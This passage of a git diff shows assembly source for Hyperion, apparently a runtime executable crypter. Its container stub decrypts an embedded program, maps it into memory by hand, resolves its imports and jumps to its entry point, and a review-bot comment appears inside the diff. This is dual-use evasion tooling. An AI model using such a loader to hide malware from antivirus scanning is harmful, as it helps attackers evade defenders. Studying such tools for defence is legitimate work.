+++ b/binary/hyperion/source/Src/Container/32/logfile_enable.asm
@@ -1,251 +1,251 @@ -;------------------------------------------- -;the content of this file is excluded, | -;when the user disables logging features | -;in hyperion command line. pls keep in mind | -;and dont rely on its existence. | -;------------------------------------------- - -;--- Begin Macro Section --- - -;writes a string and a newline to the logfile -macro writeWithNewLine char_sequence, char_buffer, error_exit -{ - char_sequence char_buffer - lea eax,[str1] - stdcall writeLog_,[APITable],eax - test eax,eax - jz error_exit - stdcall writeNewLineToLog_,[APITable] - test eax,eax - jz error_exit -} - -;write a string to the logfile -macro writeLog apitable, content{ - stdcall writeLog_,[apitable], content -} - -;delete old log file and create a new one -macro initLogFile apitable{ - stdcall initLogFile_, [apitable] -} - -;write a newline into logfile -macro writeNewLineToLog apitable{ - stdcall writeNewLineToLog_, [apitable] -} - -;write a register value into logile -macro writeRegisterToLog apitable, value{ - stdcall writeRegisterToLog_, [apitable], value -} - -;--- End Macro Section --- - -;write into log.txt -;returns false if an eerror occurs -proc writeLog_ stdcall APITable:DWORD, content:DWORD - -local str1[256]:BYTE, oldlogsize:DWORD, newlogsize:DWORD, contentsize:DWORD,\ - filehandle:DWORD, filemappingobject:DWORD, mapaddress:DWORD, retval:DWORD - - pushad - ;open file - createStringLogTxt str1 - mov eax,[APITable] - lea ebx,[str1] - sub edx,edx - stdcall dword [eax+CreateFile], ebx, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ, edx, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, edx - mov [retval],eax - test eax,eax - jz wl_logexit - mov [filehandle],eax - - ;get logfile size - mov eax,[APITable] - stdcall dword [eax+GetFileSize], dword [filehandle], 0 - mov [oldlogsize],eax - - ;get size of string for logfile for concatenation - stdcall strlen_, dword [content] - mov [contentsize], eax - add eax,dword [oldlogsize] - mov [newlogsize], eax - - ;create the 
file mapping - sub ebx,ebx - mov edx,[APITable] - stdcall dword [edx+CreateFileMapping], dword [filehandle], ebx, PAGE_READWRITE, ebx, eax, ebx - mov [retval],eax - test eax, eax - jz wl_closelogfile - mov [filemappingobject],eax - - sub ebx,ebx - mov edx,[APITable] - stdcall dword [edx+MapViewOfFile], eax, FILE_MAP_ALL_ACCESS, ebx, ebx, dword [newlogsize] - mov [retval],eax - test eax, eax - jz wl_closemaphandle - mov [mapaddress],eax - - ;copy string into map - add eax,[oldlogsize] - mov edi,eax - mov esi,[content] - mov ecx,[contentsize] - repz movsb - mov [retval],1 - -wl_unmapfile: - mov edx,[APITable] - stdcall dword [edx+UnmapViewOfFile], dword [mapaddress] - -wl_closemaphandle: - mov edx,[APITable] - stdcall dword [edx+CloseHandle], dword [filemappingobject] - -wl_closelogfile: - mov eax,[APITable] - stdcall dword [eax+CloseHandle], dword [filehandle] - -wl_logexit: - popad - mov eax,[retval] - ret; - -endp - -;adds a to the logfile -;returns false if an error occurs -proc writeNewLineToLog_ APITable:DWORD - -local str1[3]:BYTE - - lea eax,[str1] - mov byte [eax+0],13 - mov byte [eax+1],10 - mov byte [eax+2],0 - stdcall writeLog_, [APITable], eax - ret - -endp - -;adds "" to the logfile -;returns false if an error occurs -proc writeRegisterToLog_ stdcall APITable:DWORD, Value:DWORD - -local str1[10]:BYTE, retval:DWORD - - pushad - lea eax,[str1] - stdcall binToString_, eax, [Value] - stdcall writeLog_,[APITable],eax - mov [retval],eax - test eax,eax - jz wrtl_exit - stdcall writeNewLineToLog_,[APITable] - mov [retval],eax - test eax,eax - jz wrtl_exit - -wrtl_exit: - popad - mov eax,[retval] - ret - -endp - -;converts into an 8 byte string and stores it -proc binToString_ stdcall buffer:DWORD, bin:DWORD - - pushad - mov ebx,[bin] - mov ecx,8 - -bts_next_byte: - mov eax,ebx - and eax,0000000fh - cmp eax,9 - jg bts_add_55 -bts_add_48: - add eax,48 - jmp bts_store_bin -bts_add_55: - add eax,55 -bts_store_bin: - dec ecx - mov edx,[buffer] - mov byte 
[ecx+edx],al - test ecx,ecx - jz bts_finished_conversion - shr ebx,4 - jmp bts_next_byte - -bts_finished_conversion: - mov eax,[buffer] - mov byte [eax+8],0 - popad - ret -endp - -;get the length of a string -proc strlen_ stdcall string_ptr:DWORD - - push edi - push ecx - mov edi,[string_ptr] - sub ecx, ecx - sub al, al - not ecx - cld - repne scasb - not ecx - dec ecx - mov eax,ecx - pop ecx - pop edi - ret - -endp - -;Write initial message into logfile -proc initLogFile_ stdcall APITable:DWORD - -local str1[256]:BYTE - - pushad - createStringLogTxt str1 - mov eax,[APITable] - lea ebx,[str1] - stdcall dword [eax+DeleteFile],ebx - createStringStartingHyperionLines str1 - lea eax,[str1] - stdcall writeLog_,[APITable],eax - test eax,eax - jz ilf_exit_error - createStringStartingHyperion str1 - lea eax,[str1] - stdcall writeLog_,[APITable],eax - test eax,eax - jz ilf_exit_error - createStringStartingHyperionLines str1 - lea eax,[str1] - stdcall writeLog_,[APITable],eax - test eax,eax - jz ilf_exit_error - stdcall writeNewLineToLog_,[APITable] - test eax,eax - jz ilf_exit_error - -ilf_exit_success: - popad - mov eax,1 - ret - -ilf_exit_error: - popad - sub eax,eax - ret - +;------------------------------------------- +;the content of this file is excluded, | +;when the user disables logging features | +;in hyperion command line. pls keep in mind | +;and dont rely on its existence. 
| +;------------------------------------------- + +;--- Begin Macro Section --- + +;writes a string and a newline to the logfile +macro writeWithNewLine char_sequence, char_buffer, error_exit +{ + char_sequence char_buffer + lea eax,[str1] + stdcall writeLog_,[APITable],eax + test eax,eax + jz error_exit + stdcall writeNewLineToLog_,[APITable] + test eax,eax + jz error_exit +} + +;write a string to the logfile +macro writeLog apitable, content{ + stdcall writeLog_,[apitable], content +} + +;delete old log file and create a new one +macro initLogFile apitable{ + stdcall initLogFile_, [apitable] +} + +;write a newline into logfile +macro writeNewLineToLog apitable{ + stdcall writeNewLineToLog_, [apitable] +} + +;write a register value into logile +macro writeRegisterToLog apitable, value{ + stdcall writeRegisterToLog_, [apitable], value +} + +;--- End Macro Section --- + +;write into log.txt +;returns false if an eerror occurs +proc writeLog_ stdcall APITable:DWORD, content:DWORD + +local str1[256]:BYTE, oldlogsize:DWORD, newlogsize:DWORD, contentsize:DWORD,\ + filehandle:DWORD, filemappingobject:DWORD, mapaddress:DWORD, retval:DWORD + + pushad + ;open file + createStringLogTxt str1 + mov eax,[APITable] + lea ebx,[str1] + sub edx,edx + stdcall dword [eax+CreateFile], ebx, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ, edx, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, edx + mov [retval],eax + test eax,eax + jz wl_logexit + mov [filehandle],eax + + ;get logfile size + mov eax,[APITable] + stdcall dword [eax+GetFileSize], dword [filehandle], 0 + mov [oldlogsize],eax + + ;get size of string for logfile for concatenation + stdcall strlen_, dword [content] + mov [contentsize], eax + add eax,dword [oldlogsize] + mov [newlogsize], eax + + ;create the file mapping + sub ebx,ebx + mov edx,[APITable] + stdcall dword [edx+CreateFileMapping], dword [filehandle], ebx, PAGE_READWRITE, ebx, eax, ebx + mov [retval],eax + test eax, eax + jz wl_closelogfile + mov [filemappingobject],eax + + 
sub ebx,ebx + mov edx,[APITable] + stdcall dword [edx+MapViewOfFile], eax, FILE_MAP_ALL_ACCESS, ebx, ebx, dword [newlogsize] + mov [retval],eax + test eax, eax + jz wl_closemaphandle + mov [mapaddress],eax + + ;copy string into map + add eax,[oldlogsize] + mov edi,eax + mov esi,[content] + mov ecx,[contentsize] + repz movsb + mov [retval],1 + +wl_unmapfile: + mov edx,[APITable] + stdcall dword [edx+UnmapViewOfFile], dword [mapaddress] + +wl_closemaphandle: + mov edx,[APITable] + stdcall dword [edx+CloseHandle], dword [filemappingobject] + +wl_closelogfile: + mov eax,[APITable] + stdcall dword [eax+CloseHandle], dword [filehandle] + +wl_logexit: + popad + mov eax,[retval] + ret; + +endp + +;adds a to the logfile +;returns false if an error occurs +proc writeNewLineToLog_ APITable:DWORD + +local str1[3]:BYTE + + lea eax,[str1] + mov byte [eax+0],13 + mov byte [eax+1],10 + mov byte [eax+2],0 + stdcall writeLog_, [APITable], eax + ret + +endp + +;adds "" to the logfile +;returns false if an error occurs +proc writeRegisterToLog_ stdcall APITable:DWORD, Value:DWORD + +local str1[10]:BYTE, retval:DWORD + + pushad + lea eax,[str1] + stdcall binToString_, eax, [Value] + stdcall writeLog_,[APITable],eax + mov [retval],eax + test eax,eax + jz wrtl_exit + stdcall writeNewLineToLog_,[APITable] + mov [retval],eax + test eax,eax + jz wrtl_exit + +wrtl_exit: + popad + mov eax,[retval] + ret + +endp + +;converts into an 8 byte string and stores it +proc binToString_ stdcall buffer:DWORD, bin:DWORD + + pushad + mov ebx,[bin] + mov ecx,8 + +bts_next_byte: + mov eax,ebx + and eax,0000000fh + cmp eax,9 + jg bts_add_55 +bts_add_48: + add eax,48 + jmp bts_store_bin +bts_add_55: + add eax,55 +bts_store_bin: + dec ecx + mov edx,[buffer] + mov byte [ecx+edx],al + test ecx,ecx + jz bts_finished_conversion + shr ebx,4 + jmp bts_next_byte + +bts_finished_conversion: + mov eax,[buffer] + mov byte [eax+8],0 + popad + ret +endp + +;get the length of a string +proc strlen_ stdcall 
string_ptr:DWORD + + push edi + push ecx + mov edi,[string_ptr] + sub ecx, ecx + sub al, al + not ecx + cld + repne scasb + not ecx + dec ecx + mov eax,ecx + pop ecx + pop edi + ret + +endp + +;Write initial message into logfile +proc initLogFile_ stdcall APITable:DWORD + +local str1[256]:BYTE + + pushad + createStringLogTxt str1 + mov eax,[APITable] + lea ebx,[str1] + stdcall dword [eax+DeleteFile],ebx + createStringStartingHyperionLines str1 + lea eax,[str1] + stdcall writeLog_,[APITable],eax + test eax,eax + jz ilf_exit_error + createStringStartingHyperion str1 + lea eax,[str1] + stdcall writeLog_,[APITable],eax + test eax,eax + jz ilf_exit_error + createStringStartingHyperionLines str1 + lea eax,[str1] + stdcall writeLog_,[APITable],eax + test eax,eax + jz ilf_exit_error + stdcall writeNewLineToLog_,[APITable] + test eax,eax + jz ilf_exit_error + +ilf_exit_success: + popad + mov eax,1 + ret + +ilf_exit_error: + popad + sub eax,eax + ret + endp \ No newline at end of file diff --git a/binary/hyperion/source/Src/FasmContainer32/main.asm b/binary/hyperion/source/Src/Container/32/main.asm similarity index 87% rename from binary/hyperion/source/Src/FasmContainer32/main.asm rename to binary/hyperion/source/Src/Container/32/main.asm index 95b631d..8f64bfc 100644 --- a/binary/hyperion/source/Src/FasmContainer32/main.asm +++ b/binary/hyperion/source/Src/Container/32/main.asm 
@@ -1,133 +1,133 @@ -; Hyperion 32-Bit container.exe - -include 'image_base.inc' -format PE GUI 4.0 at IMAGE_BASE -entry start - -include '..\..\Fasm\fasminclude\win32a.inc' -include '..\..\FasmAES-1.0\aes\aes.inc' -include 'hyperion.inc' -include 'createstrings.inc' -include 'pe.inc' -;automatically generated by hyperion cpp stub -include 'key_size.inc' -include 'infile_size.inc' -include 'image_size.inc' -;--- - -;this contains the decrypted and loaded executable -section '.bss' data readable writeable - - decrypted_infile: db IMAGE_SIZE dup (?) - -;-------------------------------------------------- - -;this contains the encrypted exe -section '.data' data readable writeable - - encrypted_infile: include 'infile_array.inc' - -;-------------------------------------------------- - -section '.text' code readable executable - -;include necessary functions -include 'logfile_select.asm' -include 'loadapis.asm' -include 'loadexecutable.asm' -include 'decryptexecutable.asm' -include '..\..\FasmAES-1.0\aes\aes.asm' - -start: stdcall MainMethod - invoke ExitProcess,0 - -proc MainMethod stdcall - local str1[256]:BYTE,\ - APITable:DWORD,\ - CreateFileMapping_:DWORD,\ - MapViewOfFile_:DWORD,\ - UnmapViewOfFile_:DWORD,\ - CreateFile_:DWORD,\ - CloseHandle_:DWORD,\ - DeleteFile_:DWORD,\ - GetModuleHandle_:DWORD,\ - VirtualAlloc_:DWORD,\ - VirtualProtect_:DWORD,\ - VirtualFree_:DWORD - - ;pointer to the API table - lea eax,[CreateFileMapping_] - mov [APITable],eax - - ;load APIs for log file access - stdcall loadLogAPIs,[APITable] - test eax,eax - jz main_exiterrornolog - - ;create logfile and write initial message into it - initLogFile APITable - test eax,eax - jz main_exiterrornolog - - ;load all necessary APIs - stdcall loadRegularAPIs, [APITable] - test eax,eax - jz main_exiterror - writeNewLineToLog APITable - test eax,eax - jz main_exiterror - - ;decrypt exe in data section - stdcall decryptExecutable, [APITable], encrypted_infile - test eax,eax - jz main_exiterror - - 
;load the executable at its image base - ;(this will overwrite current MZ header and bss section) - stdcall loadExecutable, [APITable], encrypted_infile - test eax,eax - jz main_exiterror - - ;start program execution - mov edx,IMAGE_BASE - mov eax,[edx+IMAGE_DOS_HEADER.e_lfanew] - add eax,edx - add eax,4 - ;image file header now in eax - add eax,sizeof.IMAGE_FILE_HEADER - mov eax,[eax+IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint] - add eax,IMAGE_BASE - ;entry point of original exe is now in eax - jmp eax - -;finished without errors -main_exitsuccess: - writeNewLineToLog APITable - createStringDone str1 - lea eax,[str1] - writeLog APITable, eax - ret - -;finished with errors after logfile API loading -main_exiterror: - writeNewLineToLog APITable - createStringError str1 - lea eax,[str1] - writeLog APITable, eax - ret - -;finished with errors before logfile API loading -main_exiterrornolog: - ret - -endp - -;import table -section '.idata' import data readable writeable - - library kernel,'KERNEL32.DLL' - - import kernel,\ - GetProcAddress,'GetProcAddress',\ - LoadLibrary,'LoadLibraryA',\ - ExitProcess,'ExitProcess' +; Hyperion 32-Bit container.exe + +include 'image_base.inc' +include 'main_prolog.inc' ;format PE ... +entry start + +include '..\..\..\Fasm\INCLUDE\win32a.inc' +include 'hyperion.inc' +include 'createstrings.inc' +include 'pe.inc' +;automatically generated by hyperion cpp stub +include 'key_size.inc' +include 'infile_size.inc' +include 'image_size.inc' +;--- + +;this contains the decrypted and loaded executable +section '.bss' data readable writeable + +decrypted_infile: db IMAGE_SIZE dup (?) 
+ +;-------------------------------------------------- + +;this contains the encrypted exe +section '.data' data readable writeable + +encrypted_infile: include 'infile_array.inc' + +;-------------------------------------------------- + +section '.text' code readable executable + +;include necessary functions +include 'logfile_select.asm' +include 'loadapis.asm' +include 'loadexecutable.asm' +;automatically generated by hyperion cpp stub +include 'decryption_payload.asm' +;--- + +start: stdcall MainMethod + invoke ExitProcess,0 + +proc MainMethod stdcall + local str1[256]:BYTE,\ + APITable:DWORD,\ + CreateFileMapping_:DWORD,\ + MapViewOfFile_:DWORD,\ + UnmapViewOfFile_:DWORD,\ + CreateFile_:DWORD,\ + CloseHandle_:DWORD,\ + DeleteFile_:DWORD,\ + GetModuleHandle_:DWORD,\ + VirtualAlloc_:DWORD,\ + VirtualProtect_:DWORD,\ + VirtualFree_:DWORD + + ;pointer to the API table + lea eax,[CreateFileMapping_] + mov [APITable],eax + + ;load APIs for log file access + stdcall loadLogAPIs,[APITable] + test eax,eax + jz main_exiterrornolog + + ;create logfile and write initial message into it + initLogFile APITable + test eax,eax + jz main_exiterrornolog + + ;load all necessary APIs + stdcall loadRegularAPIs, [APITable] + test eax,eax + jz main_exiterror + writeNewLineToLog APITable + test eax,eax + jz main_exiterror + + ;decrypt exe in data section + stdcall decryptExecutable, [APITable], encrypted_infile + test eax,eax + jz main_exiterror + + ;load the executable at its image base + ;(this will overwrite current MZ header and bss section) + stdcall loadExecutable, [APITable], encrypted_infile + test eax,eax + jz main_exiterror + + ;start program execution + mov edx,IMAGE_BASE + mov eax,[edx+IMAGE_DOS_HEADER.e_lfanew] + add eax,edx + add eax,4 + ;image file header now in eax + add eax,sizeof.IMAGE_FILE_HEADER + mov eax,[eax+IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint] + add eax,IMAGE_BASE + ;entry point of original exe is now in eax + jmp eax + +;finished without errors 
+main_exitsuccess: + writeNewLineToLog APITable + createStringDone str1 + lea eax,[str1] + writeLog APITable, eax + ret + +;finished with errors after logfile API loading +main_exiterror: + writeNewLineToLog APITable + createStringError str1 + lea eax,[str1] + writeLog APITable, eax + ret + +;finished with errors before logfile API loading +main_exiterrornolog: + ret + +endp + +;import table +section '.idata' import data readable writeable + + library kernel,'KERNEL32.DLL' + + import kernel,\ + GetProcAddress,'GetProcAddress',\ + LoadLibrary,'LoadLibraryA',\ + ExitProcess,'ExitProcess' diff --git a/binary/hyperion/source/Src/FasmContainer32/pe.inc b/binary/hyperion/source/Src/Container/32/pe.inc similarity index 100% rename from binary/hyperion/source/Src/FasmContainer32/pe.inc rename to binary/hyperion/source/Src/Container/32/pe.inc diff --git a/binary/hyperion/source/Src/Container/64/loadexecutable.asm b/binary/hyperion/source/Src/Container/64/loadexecutable.asm new file mode 100644 index 0000000..d63f2bb --- /dev/null +++ b/binary/hyperion/source/Src/Container/64/loadexecutable.asm 
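Review bot: The include lines now pull in two generated files, `main_prolog.inc` and `decryption_payload.asm`, in place of the static AES sources, but nothing in main.asm says what they must provide, even though the body still calls `decryptExecutable, [APITable], encrypted_infile` and treats a zero return as failure, and the `format PE ...` directive is expected to come from the prolog. I would extend the two marker comments: `;automatically generated by hyperion cpp stub: must define proc decryptExecutable APITable, infile (eax=0 on failure)` and `;main_prolog.inc: generated 'format PE ... at IMAGE_BASE' directive`. The `main_exitsuccess` path after `jmp eax` is unreachable in this build, since control never comes back from the unpacked entry point, and the "finished without errors" comment should say so to avoid a reader expecting the Done line in the log.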
@@ -0,0 +1,553 @@
+;Loads the exe which is stored in input_image
+;into memory and starts its execution
+proc loadExecutable input_image:QWORD
+
+local str1[256]:BYTE, ret_val:QWORD, image_file_header:QWORD,\
+loaded_file:QWORD
+
+ mov [input_image],rcx
+
+ ;verify checksum of packed executable
+ writeWithNewLine createStringVerifyChecksum, str1, le_exit_error
+ fastcall verifyChecksum, [input_image], INFILE_SIZE
+ test rax,rax
+ jz le_exit_error
+
+ ;verify whether the content of the data section is pe
+ writeWithNewLine createStringVerifyPE, str1, le_exit_error
+ mov rax,[input_image]
+ add rax,4
+ fastcall verifyPE, rax
+ test rax,rax
+ mov [image_file_header],rax
+ jz le_exit_error
+
+ ;copy pe header and sections into memory
+ writeNewLineToLog le_exit_error
+ writeWithNewLine createStringMappingFileInMemory, str1, le_exit_error
+ mov rax,[input_image]
+ add rax,4
+ fastcall loadFile, [image_file_header], rax, INFILE_SIZE-4
+ test rax,rax
+ mov [loaded_file],rax
+ jz le_exit_error
+
+ ;loading import table
+ writeNewLineToLog le_exit_error
+ writeWithNewLine createStringLoadingFilesAPIs, str1, le_exit_error
+ fastcall loadImportTable, [loaded_file]
+ test rax,rax
+ jz le_exit_error
+
+ ;set the correct permissions for each section
+ writeNewLineToLog le_exit_error
+ writeWithNewLine createStringSettingPermissions, str1, le_exit_error
+ mov rax,[input_image]
+ add rax,4
+ fastcall setPermissions, [image_file_header], rax, INFILE_SIZE-4
+ test rax,rax
+ jz le_exit_error
+
+le_exit_success:
+ mov rax,1
+ ret
+
+le_exit_error:
+ sub rax,rax
+ ret
+
+endp
+
+;load the APIs in the import table
+proc loadImportTable uses rsi rdi rbx, image_base:QWORD
+
+local str1[256]:BYTE, import_table:QWORD, null_directory_entry[sizeof.IMAGE_IMPORT_DESCRIPTOR]:BYTE
+
+ mov [image_base], rcx
+
+ ;find import table in data directory
+ mov rdx,[image_base]
+ mov eax,[rdx+IMAGE_DOS_HEADER.e_lfanew]
+ add rax,rdx
+ add rax,4
+ ;image file header now in eax
+ add rax,sizeof.IMAGE_FILE_HEADER
+ lea rax,[rax+IMAGE_OPTIONAL_HEADER64.DataDirectory]
+ ;first data directory entry now in eax
+ add rax,sizeof.IMAGE_DATA_DIRECTORY
+ ;import data directory entry now in eax
+ mov eax,[rax+IMAGE_DATA_DIRECTORY.VirtualAddress]
+ add rax,rdx
+ ;pointer to import table now in eax
+ mov [import_table],rax
+ writeWithNewLine createStringFoundImportTable, str1, le_exit_error
+ writeRegisterToLog [import_table], pit_exit_error
+
+ ;init null directory entry
+ lea r8,[null_directory_entry]
+ mov rcx,sizeof.IMAGE_IMPORT_DESCRIPTOR
+ mov al,0
+pit_init_null_directory_loop:
+ mov [r8],al
+ inc r8
+ dec rcx
+ jnz pit_init_null_directory_loop
+
+ mov rbx,[import_table]
+ ;iterate over the directory tables
+pit_next_directory_entry:
+ lea rsi,[null_directory_entry]
+ mov rdi,rbx
+ mov rcx,sizeof.IMAGE_IMPORT_DESCRIPTOR
+ rep cmpsb
+ je pit_exit_success
+ ;load APIs of this directory
+ fastcall loadImportDirectoryTable, [image_base], rbx
+ test rax,rax
+ jz pit_exit_error
+ ;next entry
+ add rbx,sizeof.IMAGE_IMPORT_DESCRIPTOR
+ jmp pit_next_directory_entry
+
+pit_exit_success:
+ mov eax,1
+ jmp pit_exit_ret
+
+pit_exit_error:
+ sub rax,rax
+
+pit_exit_ret:
+ ret
+
+endp
+
+;loads the APIs
+proc loadImportDirectoryTable uses rbx r12, image_base:QWORD, directory_entry:QWORD
+
+local str1[256]:BYTE, lookup_table:QWORD, import_address_table:QWORD, dll_image_base:QWORD
+
+ mov [image_base],rcx
+ mov [directory_entry],rdx
+
+ ;write info about data directory table to logfile
+ writeNewLineToLog lidt_exit_error
+ writeWithNewLine createStringProcessImportDirectory, str1, lidt_exit_error
+ mov rax,[directory_entry]
+ mov eax,[rax+IMAGE_IMPORT_DESCRIPTOR.Name_]
+ add rax,[image_base]
+ mov rbx,rax
+ ;pointer to dll name in ebx
+ writeLog rax, lidt_exit_error
+ writeNewLineToLog lidt_exit_error
+
+ ;load the corresponding dll
+ invoke LoadLibrary, rbx
+ test rax,rax
+ jz lidt_exit_error
+ mov [dll_image_base],rax
+
+ ;read pointers to the api tables
+ mov rdx,[directory_entry]
+ mov eax,[rdx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
+ add rax,[image_base]
+ mov [import_address_table],rax
+ ;check whether OriginalFirstThunk exists and can be used
+ mov eax,[rdx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk]
+ test eax,eax
+ jnz lidt_use_original_first_thunk
+ ;in some binaries, OriginalFirstThunk table is empty
+ ;in this case, use FirstThunk insteadt to fetch API names or ordinals
+ mov eax,[rdx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
+lidt_use_original_first_thunk:
+ add rax,[image_base]
+ mov [lookup_table],rax
+
+ ;index to current API
+ sub r12,r12
+ ;iterate the lookup_table entries
+lidt_next_lookup_entry:
+ mov rcx,r12
+ mov rax,[lookup_table]
+ add rax,r12 ;counter is in r12
+ mov rax,[rax] ;get entry (64 bit in PE+)
+ test rax,rax
+ jz lidt_exit_success
+ mov rbx,rax
+ mov rcx,IMAGE_ORDINAL_FLAG64
+ and rax,rcx
+ jnz lidt_byordinal
+lidt_byname:
+ createStringName str1
+ writeLog rax, lidt_exit_error
+ add rbx,[image_base] ;according to spec, first 32 bits are 0, therefore add is possible
+ lea rbx,[rbx+IMAGE_IMPORT_BY_NAME.Name_]
+ mov rax,rbx ;pointer to API name is now in rax and rbx
+ writeLog rax, lidt_exit_error
+ writeNewLineToLog lidt_exit_error
+ ;API name pointer in rbx
+ invoke GetProcAddress, [dll_image_base], rbx
+ test rax,rax
+ jz lidt_exit_error
+ mov rbx,[import_address_table]
+ add rbx,r12
+ mov [rbx],rax
+ ;fetch next API
+ add r12,8 ;size of entries in import lookup table and import address table is 8 in PE+
+ jmp lidt_next_lookup_entry
+
+lidt_byordinal:
+ createStringOrdinal str1
+ writeLog rax, lidt_exit_error
+ ;remove the ordinal flag
+ mov rcx,IMAGE_ORDINAL_FLAG64
+ xor rbx,rcx
+ mov rax,rbx
+ writeRegisterToLog rax, lidt_exit_error
+ ;API ordinal in rbx
+ invoke GetProcAddress, [dll_image_base], rbx
+ test rax,rax
+ jz lidt_exit_error
+ mov rbx,[import_address_table]
+ add rbx,r12
+ mov [rbx],rax
+ ;fetch next API
+ add r12,8
+ jmp lidt_next_lookup_entry
+
+lidt_exit_success:
+ mov rax,1
+ jmp lidt_exit_ret
+
+lidt_exit_error:
+ sub rax,rax
+
+lidt_exit_ret:
+ ret
+
+endp;
+
+;sets the memory permissions for each section
+proc setPermissions uses rbx r12, image_file_header:QWORD, file_image_base:QWORD, \
+file_image_size:QWORD
+
+local number_of_sections:QWORD, image_base:QWORD, section_headers:QWORD,\
+pe_header_size:QWORD, str1[256]:BYTE, vprotect_ret:QWORD
+
+ mov [image_file_header],rcx
+ mov [file_image_base],rdx
+ mov [file_image_size],r8
+
+ ;find section header
+ sub rax,rax
+ mov rdx,[image_file_header]
+ mov ax,[rdx+IMAGE_FILE_HEADER.NumberOfSections]
+ mov [number_of_sections],rax
+ add rdx,sizeof.IMAGE_FILE_HEADER
+ mov rax,[rdx+IMAGE_OPTIONAL_HEADER64.ImageBase]
+ mov [image_base],rax
+ ;search for section header
+ lea r12,[rdx+IMAGE_OPTIONAL_HEADER64.DataDirectory]
+ mov eax,[rdx+IMAGE_OPTIONAL_HEADER64.NumberOfRvaAndSizes]
+ mov rdx,sizeof.IMAGE_DATA_DIRECTORY
+ mul rdx
+ add rax,r12
+ ;first section header found
+ mov [section_headers],rax
+ mov rax,sizeof.IMAGE_SECTION_HEADER
+ mov rdx,[number_of_sections]
+ mul rdx
+ ;end of section header sections found
+ add rax,[section_headers]
+ mov r12,[file_image_base]
+ sub rax,r12
+ ;unaligned size of pe header in eax
+ mov [pe_header_size],rax
+
+ ;set pe header page read-only
+ lea r12,[vprotect_ret]
+ invoke VirtualProtect, [image_base], [pe_header_size], PAGE_READONLY, r12
+ test rax,rax
+ jz sp_exit_error
+
+ ;some output for the user
+ writeRegisterToLog [image_base], sp_exit_error
+
+ ;set the section page permissions
+ mov r12,[number_of_sections]
+ mov rbx,[section_headers]
+sp_load_section_loop:
+ fastcall setSection, rbx, [image_base], [file_image_base]
+ test rax,rax
+ jz sp_exit_error
+ add rbx,sizeof.IMAGE_SECTION_HEADER
+ dec r12
+ jnz sp_load_section_loop
+
+sp_exit_success:
+ mov rax,1
+ jmp sp_exit_ret
+
+sp_exit_error:
+ sub rax,rax
+
+sp_exit_ret:
+ ret
+
+endp;
+
+;sets the complete image of the decrypted file writeable so
+;we can copy pe header and sections into it
+proc loadFile uses rbx rdi rsi, image_file_header:QWORD, file_image_base:QWORD, \
+file_image_size:QWORD
+
+local number_of_sections:QWORD, image_base:QWORD, aux:QWORD,\
+str1[256]:BYTE, vprotect_ret:QWORD, section_headers:QWORD, pe_header_size:QWORD
+
+ mov [image_file_header],rcx
+ mov [file_image_base],rdx
+ mov [file_image_size],r8
+
+ ;find section header
+ ;mov edx,[image_file_header]
+ sub rax,rax
+ mov rdx,[image_file_header]
+ mov ax,[rdx+IMAGE_FILE_HEADER.NumberOfSections]
+ mov [number_of_sections],rax
+ add rdx,sizeof.IMAGE_FILE_HEADER
+ mov rax,[rdx+IMAGE_OPTIONAL_HEADER64.ImageBase]
+ mov [image_base],rax
+ ;make the complete image writable
+ mov esi,[rdx+IMAGE_OPTIONAL_HEADER64.SizeOfImage]
+ mov [aux],rdx ;store edx, we need it later
+ lea rbx,[vprotect_ret]
+ invoke VirtualProtect, [image_base], rsi, PAGE_READWRITE, rbx
+ test rax,rax
+ jz lf_exit_error
+
+ ;some output for the user
+ writeWithNewLine createStringLoadedPEHeader, str1, lf_exit_error
+ writeRegisterToLog [image_base], lf_exit_error
+
+ mov rdx,[aux] ;restore rdx
+ ;continue search for section header
+ lea rbx,[rdx+IMAGE_OPTIONAL_HEADER64.DataDirectory]
+ mov eax,[rdx+IMAGE_OPTIONAL_HEADER64.NumberOfRvaAndSizes]
+ mov rdx,sizeof.IMAGE_DATA_DIRECTORY
+ mul rdx
+ add rax,rbx
+
+ ;first section header found
+ mov [section_headers],rax
+ mov rax,sizeof.IMAGE_SECTION_HEADER
+ mov rdx,[number_of_sections]
+ mul rdx
+ ;end of section header sections found
+ add rax,[section_headers]
+ mov rbx,[file_image_base]
+ sub rax,rbx
+ ;unaligned size of pe header in eax
+ mov [pe_header_size],rax
+
+ ;copy header to memory
+ mov rdi,[image_base]
+ mov rsi,[file_image_base]
+ mov rcx,[pe_header_size]
+ rep movsb
+
+ ;load the sections
+ mov rsi,[number_of_sections]
+ mov rbx,[section_headers]
+lf_load_section_loop:
+ fastcall loadSection, rbx, [image_base], [file_image_base]
+ test rax,rax
+ jz lf_exit_error
+ add rbx,sizeof.IMAGE_SECTION_HEADER
+ dec rsi
+ jnz lf_load_section_loop
+
+lf_exit_success:
+ mov rax,[image_base]
+ jmp lf_exit_ret
+
+lf_exit_error:
+ sub rax,rax
+
+lf_exit_ret:
+ ret
+endp
+
+;load the corresponding section into memory
+proc loadSection uses rdi rsi r12, section_header:QWORD, image_base:QWORD,\
+file_image_base:QWORD
+
+local str1[256]:BYTE
+
+ mov [section_header],rcx
+ mov [image_base],rdx
+ mov [file_image_base],r8
+
+ ;copy from file into memory
+ mov rdx,[section_header]
+ mov edi,[rdx+IMAGE_SECTION_HEADER.VirtualAddress]
+ add rdi,[image_base]
+ mov esi,[rdx+IMAGE_SECTION_HEADER.PointerToRawData]
+ add rsi,[file_image_base]
+ mov ecx,[rdx+IMAGE_SECTION_HEADER.SizeOfRawData]
+ rep movsb
+ writeSectionNameAndAddressToLog
+
+ls_exit_success:
+ mov rax,1
+ jmp ls_exit_ret
+
+ls_exit_error:
+ sub rax,rax
+
+ls_exit_ret:
+ ret
+
+endp
+
+;set the memory page permission for the corresponding section
+proc setSection uses rbx r12, section_header:QWORD, image_base:QWORD,\
+file_image_base:QWORD
+
+local section_flags:QWORD, vprotect_ret:QWORD, str1[256]:BYTE
+
+ mov [section_header],rcx
+ mov [image_base],rdx
+ mov [file_image_base],r8
+
+ ;section execute/read/write?
+ mov rdx,[section_header]
+ mov ebx,[rdx+IMAGE_SECTION_HEADER.Characteristics]
